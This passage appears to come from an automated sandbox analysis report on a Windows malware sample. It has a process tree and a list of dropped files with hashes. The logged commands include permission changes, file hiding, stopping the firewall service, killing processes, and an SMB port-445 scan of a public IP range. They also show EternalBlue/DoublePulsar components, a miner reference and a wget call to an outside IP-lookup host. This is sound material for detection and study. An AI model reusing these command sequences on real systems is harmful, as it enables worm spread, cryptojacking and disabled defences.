        cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
        4⤵
          PID:2656
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:2612
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
        4⤵
          PID:2904
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "mssecsvc2.0"
          5⤵
            PID:1532
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\ProgramData\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
        4⤵
          PID:1268
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:1624
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\ProgramData\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
        4⤵
          PID:2892
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "mssecsvc2.1"
          5⤵
            PID:2616
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe /c /e /t /g everyone:F
        4⤵
          PID:2900
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:2736
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g system:F
        4⤵
          PID:2704
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:2660
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g everyone:F
        4⤵
          PID:2588
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:2276
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\Fonts\Mysql\same.bat /p system:n
        4⤵
          PID:2608
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:3064
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g everyone:F
        4⤵
          PID:2252
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:2840
      • C:\Windows\SysWOW64\attrib.exe
        attrib -r -h -s C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe
        4⤵
        • Views/modifies file attributes
          PID:1612
      • C:\Windows\SysWOW64\attrib.exe
        attrib -r -h -s C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe
        4⤵
        • Suspicious use of AdjustPrivilegeToken
        • Views/modifies file attributes
          PID:2368
      • C:\Windows\SysWOW64\attrib.exe
        attrib -r -h -s C:\ProgramData\clr_optimization_v4.0.30318_64
        4⤵
        • Views/modifies file attributes
          PID:2308
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:624
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\debug\xmrstak_cuda_backend.dll /p system:n
        4⤵
          PID:2348
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
        • Suspicious use of AdjustPrivilegeToken
          PID:1664
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\WINDOWS\Debug\item.dat /p system:n
        4⤵
          PID:2100
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:2524
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\WINDOWS\Web\*.vbs /p system:n
        4⤵
          PID:2388
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:1560
      • C:\Windows\SysWOW64\cacls.exe
        cacls c:\windows\web\*.bat /p system:n
        4⤵
        • Suspicious use of AdjustPrivilegeToken
          PID:2312
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:836
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\Temp\conhost.exe /p system:n
        4⤵
          PID:880
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
        • Suspicious use of AdjustPrivilegeToken
          PID:556
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:2456
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Progra~1\Common~1\conime.exe /p system:n
        4⤵
          PID:816
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:2448
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\debug\lsmosee.exe /p system:n
        4⤵
          PID:2668
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:2052
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:884
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h +r C:\Windows\help\lsmose.exe
        4⤵
        • Sets file to hidden
        • Views/modifies file attributes
          PID:908
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h +r C:\WINDOWS\Debug\item.dat
        4⤵
        • Sets file to hidden
        • Views/modifies file attributes
          PID:1404
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h +r c:\windows\web\*.bat
        4⤵
        • Sets file to hidden
        • Views/modifies file attributes
          PID:2004
      • C:\Windows\SysWOW64\net.exe
        net stop "mssecsvc2.1"
        4⤵
          PID:2892
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\System32\Tasks\WwANsvc /p system:n
        4⤵
          PID:2800
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\System32\Tasks\HomeGroupProvider /p system:n
        4⤵
          PID:2744
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:1532
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\System32\Tasks\MiscfostNsi /p system:n
        4⤵
          PID:2132
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\Tasks\*my* /p system:n
        4⤵
          PID:2708
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        4⤵
          PID:2736
                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                            cacls C:\Windows\Tasks\*ok* /p system:n
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:2900
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:2404
                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                              cacls C:\Windows\Tasks\*sa* /p system:n
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:2252
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:1696
                                                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                cacls C:\Windows\Tasks\*Group* /p system:n
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1580
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:2436
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                    cacls C:\Windows\Tasks\WwANsvc /p system:n
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:2160
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:2508
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                          cacls C:\Windows\Tasks\MiscfostNsi /p system:n
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:844
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:1112
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1752
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                cacls C:\Windows\System32\Tasks\At1 /c /e /t /g everyone:F
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                PID:1156
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:1560
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                  cacls C:\Windows\System32\Tasks\At2 /c /e /t /g system:F
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:1200
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:836
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                      cacls C:\Windows\System32\Tasks\At1 /c /e /t /g system:F
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:2220
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:1744
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                          cacls C:\windows\tasks\At1.job /c /e /t /g everyone:F
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:2512
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:3056
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                            cacls C:\windows\tasks\At2.job /c /e /t /g system:F
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1700
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                              cacls C:\windows\tasks\At1.job /c /e /t /g system:F
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:1952
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:896
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                attrib +h +s -r C:\windows\tasks\At*.job
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                PID:1224
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\xsfxdel~.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\xsfxdel~.exe" "C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Deletes itself
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:2564
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                          C:\Windows\system32\net1 stop "MicrosoftMssql"
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:3008
                                                                                                                                                                                                                          • C:\Windows\Fonts\Mysql\svchost.exe
                                                                                                                                                                                                                            C:\Windows\Fonts\Mysql\svchost.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:2980
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              cmd /c ""C:\Windows\Fonts\Mysql\cmd.bat" "
    2⤵
    • Loads dropped DLL
    PID:1380
    • C:\Windows\SysWOW64\sc.exe
      sc config Browser start= auto
      3⤵
      • Launches sc.exe
      PID:456
    • C:\Windows\SysWOW64\sc.exe
      sc config lanmanworkstation start= auto
      3⤵
      • Launches sc.exe
      PID:852
    • C:\Windows\SysWOW64\sc.exe
      sc config SharedAccess start= disabled
      3⤵
      • Launches sc.exe
      PID:1480
    • C:\Windows\SysWOW64\net.exe
      net start lanmanworkstation
      3⤵
      PID:1692
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 start lanmanworkstation
        4⤵
        PID:1516
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mance.exe
      3⤵
      • Kills process with taskkill
      PID:2324
    • C:\Windows\SysWOW64\net.exe
      net stop SharedAccess
      3⤵
      PID:1444
    • C:\Windows\SysWOW64\net.exe
      net start lanmanserver
      3⤵
      PID:1276
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Eter.exe
      3⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:656
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im puls.exe
      3⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1820
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mance.exe
      3⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1660
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Eter.exe
      3⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2412
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mance.exe
      3⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2476
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im puls.exe
      3⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1880
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im puls.exe
      3⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1556
    • C:\Windows\SysWOW64\PING.EXE
      ping 127.1 -n 5
      3⤵
      • Runs ping.exe
      PID:1260
    • C:\Windows\SysWOW64\PING.EXE
      ping 127.1 -n 3
      3⤵
      • Runs ping.exe
      PID:2292
    • C:\Windows\SysWOW64\PING.EXE
      ping 127.1 -n 3
      3⤵
      • Runs ping.exe
      PID:1496
    • C:\Windows\Fonts\Mysql\taskhost.exe
      taskhost.exe tcp 89.149.0.254 89.149.255.254 445 450 /save
      3⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      PID:2712
    • C:\Windows\Fonts\Mysql\wget.exe
      wget -O temp.txt "http://v4.ipv6-test.com/api/myip.php"
      3⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      PID:2768
    • C:\Windows\SysWOW64\net.exe
      net start Browser
      3⤵
      PID:1776
    • C:\Windows\SysWOW64\sc.exe
      sc config lanmanserver start= auto
      3⤵
      • Launches sc.exe
      PID:240
• C:\Windows\SysWOW64\mode.com
  mode con cols=50 lines=40
  1⤵
  PID:796
• C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 start lanmanserver
  1⤵
  PID:1748
• C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop SharedAccess
  1⤵
  PID:1528
• C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 start Browser
  1⤵
  PID:1428
• C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 start "MicrosoftMysql"
  1⤵
  PID:2008
• C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 start Schedule
  1⤵
  PID:2712
• C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop "lbpuamoqhpoqju171"
  1⤵
  PID:2696
                                                                                                                                                                                                                                                  • C:\Windows\system32\wbem\WMIADAP.EXE
                                                                                                                                                                                                                                                    wmiadap.exe /F /T /R
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:1112

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\Windows\Fonts\Mysql\Doublepulsar2.dll
  Filesize: 84KB
  MD5: a1dcc5c46acec31002c3273d84e9c990
  SHA1: 1d998a6dc7a27f13359008d51b4e5d5f155b281c
  SHA256: c8fee8d909b05f808257171dd83d310deebb97bf8a495ef8d3791e6ac61bba4c
  SHA512: c636311dd4c47fa35856eaa32ffe1f942c8162880e21e297220a4704ddd40445a367b780e5cbea04569100bd719149207f343a86936fe5a6061b940e9dd0dd85

• C:\Windows\Fonts\Mysql\Eternalblue2.dll
  Filesize: 69KB
  MD5: e50a77d7def8dd3008541c5cb5378ff8
  SHA1: c548ae83bf7258371d20576483dfc40d5c5b5ba2
  SHA256: 958e1435f2c1665ca53231454cf8fbc9a4d75426bae3e12c51bdf33d495e3e0c
  SHA512: 6890ed62eaf1282feee837b6194ae937dbc2df8bbb5fa3775f1d337ca6cf6de41b5e390af488125cc334acfd3d4c85f61265294ad7ecffd9bbdb4614ff5a98ed

• C:\Windows\Fonts\Mysql\cmd.bat
  Filesize: 25KB
  MD5: 66b66dc0eb2437b233a8256b9a02902f
  SHA1: 0f8664e738f52053e5b4f07812b76647bde52c9a
  SHA256: 241328fd46d6ddea11cb6ed2514a950a083e623fbdd9a02602a5696e8b6b6a0e
  SHA512: adffc967593f7632462ee458878354f8348951677295678222f9a7a86ac3ffd333d364cea1f87c2fa26860b6208d49b66a96ec23f662474d3e43fc5a5977e4be

• C:\Windows\Fonts\Mysql\ctfmon.exe
  Filesize: 200KB
  MD5: dde7a62c6e9f858f3dbe472ca9f9b693
  SHA1: 31959bce7a18628d7d9d1a06514b192196a87884
  SHA256: 4424f327aec6719f7f55dea92f9501644ad72babd4dee0f2fa817f18ab3bfc5b
  SHA512: 3adf8525ffb8bd443cead79b238121d678732aec2a4642671289bac6a71037c93302fc6c877ab5e8a5f041e8d0c367fa696de78642d1a55435d790a45fe0bfd8

• C:\Windows\Fonts\Mysql\ctfmon.exe
  Filesize: 403KB
  MD5: fac0181db3df4f89c0ce42e3b0db83bb
  SHA1: ce15828e24d07bed6f3ec40f47eb080408ce898e
  SHA256: 542585c37a688d49f62d5d8e31f461bca2132de7ca9fb7610c59588edc20dc4a
  SHA512: 7060a3bd156a01a88c9982999fdd5fa6aabea675d66dd1c00485752029315f05730d30809de5696c142ceea5c47d829cc4cc575b5b23105c337f15645035f9d0

• C:\Windows\Fonts\Mysql\same.bat
  Filesize: 11KB
  MD5: 07986ecd5f759e85db37302bd0493ea4
  SHA1: aec5bfe87cf052ca8dd4c909e5a35ff670c08edb
  SHA256: 6b891a659b3a17c238918533f704c9d47f6e2f958f94a23cace19c6922cb4829
  SHA512: ca8df30baf3a11823d0f415433c0dbf10694ffdad935189136327bd02ba150786db410dbaf4e223e0d1988b13323625675664b9642163cfddff26d669fd09a22

• C:\Windows\Fonts\Mysql\svchost.exe
  Filesize: 256KB
  MD5: 7afcf45907f225e3e3cfeece3bbcd410
  SHA1: 9747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
  SHA256: c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
  SHA512: ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f

• C:\Windows\Fonts\Mysql\svchost.exe
  Filesize: 220KB
  MD5: d19622ae565744bab6d9a7fc12cce443
  SHA1: 5ff938b91688cdc7bdb3aa1c80e5267883c343bf
  SHA256: 96cebf39c9a9fb56c95b5899f1620ad73282a620ce0bea74e27a4858403ce9e4
  SHA512: 5d089505674958671ffb186ccc849ad1346bf9bcf3fe992e5ee03d09dde21e9ae90abf32e634ad538ffb7ec05823aa95320fb1f4155f68d97ea64a9394a8c652

• C:\Windows\Fonts\Mysql\svchost.exe
  Filesize: 232KB
  MD5: dd8e72dc6e4366e47ac3c71d495cbb6b
  SHA1: 31ac29ee08cb214e0cfbdcb80245d08e58b4a3cd
  SHA256: 8f05f88b881d51ffc301075b02120e54a1d0065939ef0ac12329139b89671fd6
  SHA512: 7d1f123266ee65dd2100116c3e814d22137595f5f3bf846cdf2bcc47c35c81b424caa3afafc48e19d6f92f652969aae38bef56adb855c8a95c765ce13362b5d4

• C:\Windows\Fonts\Mysql\svchost.exe
  Filesize: 150KB
  MD5: 7904a1add3defbd2891625feec9b06ec
  SHA1: bff4d3ad5db4fd0b444d7f53bb8e18c8c1d0caa9
  SHA256: a8b2417f30ebc882d5e88e5b473913dd798a7d701c98de5fcdfad1d29c7382dd

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      686f002e6460d09be7c91cc1a9f943fc9ba3aa98a6a166ee0e354b7e2ae86c414adae7ce470b1f0e0166b962916ba71b577d6e17568f5c27b7ff5911ae47a200

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      45KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      307c298cb7695f6ccca3025493aaccec

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      15af39299ee2d8cfc8d246a70ae3fefd42e47257

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      9c6a83e8c38dd3f120d6165c09b8847f1da98d352919498d365ede6c97140ca7

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      e341819c09ad65d92538ee93c6717ddf2ac9d8a7a68192a82ce5962151ff62cd4da4d4a11b12f64a97e4b7257e30f92804a70ce6fa437466373d51030c823513

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      4fc4ca6811e3a85b4f9c0d13cc90cc98

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      ebd0b28d689cc18c2aa47125c4848c7b8c72c0b7

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      11990417f0016c6018b9f010e941ecf39fc7e08d09d6b799649c743cecaee3e6

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      a399538b23985f5f1df5a834111d64ddee535fcdee05b1e2733ed503f7f64369a63cdc955c717fd24610497685716d355bb3158cafd53125ad53472ca2a372db

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      98KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      018765099c9e56667a9cde4ac895b9ae

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      287ec71429242c5c372ab81caae7f0d0da728f2b

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      026cf2ecb3ed76f9d52cba8cfff956e95222592384177c0e64b524a7006c03bc

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      2522049620a29b246e1e7034424aebffe47e76699083e1447fed532312011e61771f2641d4eeb73b8ea00bd947e4dc759b8d160e15d3ed0fb08473ca2da914a3

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c07a7f4ca59f6b886a4fd8759c1ccba9

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      fca4e0353c1fba0023bdcc99b93c10adebfbbe26

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      9b6a35d9610d2a293a2aaa4ccb553f9acc4704eac55c36fd1c8c3f900de8fbd1

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      af6ccd6c15220e381ade8886eae85310a171220ecf51fd4e87cd12d5604bffc580e8124b2a17bfd000c43e3be486a6146d74552f4e5678222ea7d410203000ee

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\taskhost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      14KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c097fd043d3cbabcada0878505c7afa5

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      966a60028a3a24268c049ffadbe1a07b83de24ce

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\temp.txt

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      12B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      8cf4dec152a9d79a3d62202b886eda9b

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      0c1b3d3d02c0b655aa3526a58486b84872f18cc2

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      c30e56c9c8fe30ffa4a4ff712cf2fa1808ee82ca258cd4c8ebefcc82250b6c01

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      a5a65f0604f8553d0be07bd5214db52d3f167e7511d29cb64e3fa9d8c510cc79976ff2a5acb9b8c09b666f306ac8e4ad389f9a2de3ca46d57b1e91060a4c50fd

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\wget.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      392KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      bd126a7b59d5d1f97ba89a3e71425731

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      457b1cd985ed07baffd8c66ff40e9c1b6da93753

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

                                                                                                                                                                                                                                                    • \Users\Admin\AppData\Local\Temp\xsfxdel~.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      37KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      a48b642733b4ed0b2f63c726bea5710f

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      f383f6eb661b6aea3da2f4f2b21b2cbc40ced2a2

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      58361275c9ce4b07a6ee13ddc83f80e88571ea9d4e1aedc476f7d613938b47a6

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      3f43721db1ec77ff2c31e6269bed3bd6e6c0d7577cfcfe913d771da19154819e6868d995f29830623ec568b666d17639b1dd3f2e0e6bf2a21ab4b43f967a9ef6

                                                                                                                                                                                                                                                    • \Windows\Fonts\Mysql\ctfmon.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      d823b8d5a5fdc3fc30cbbc76ffadcafc

                                                                                                                                                                                                                                                      SHA1

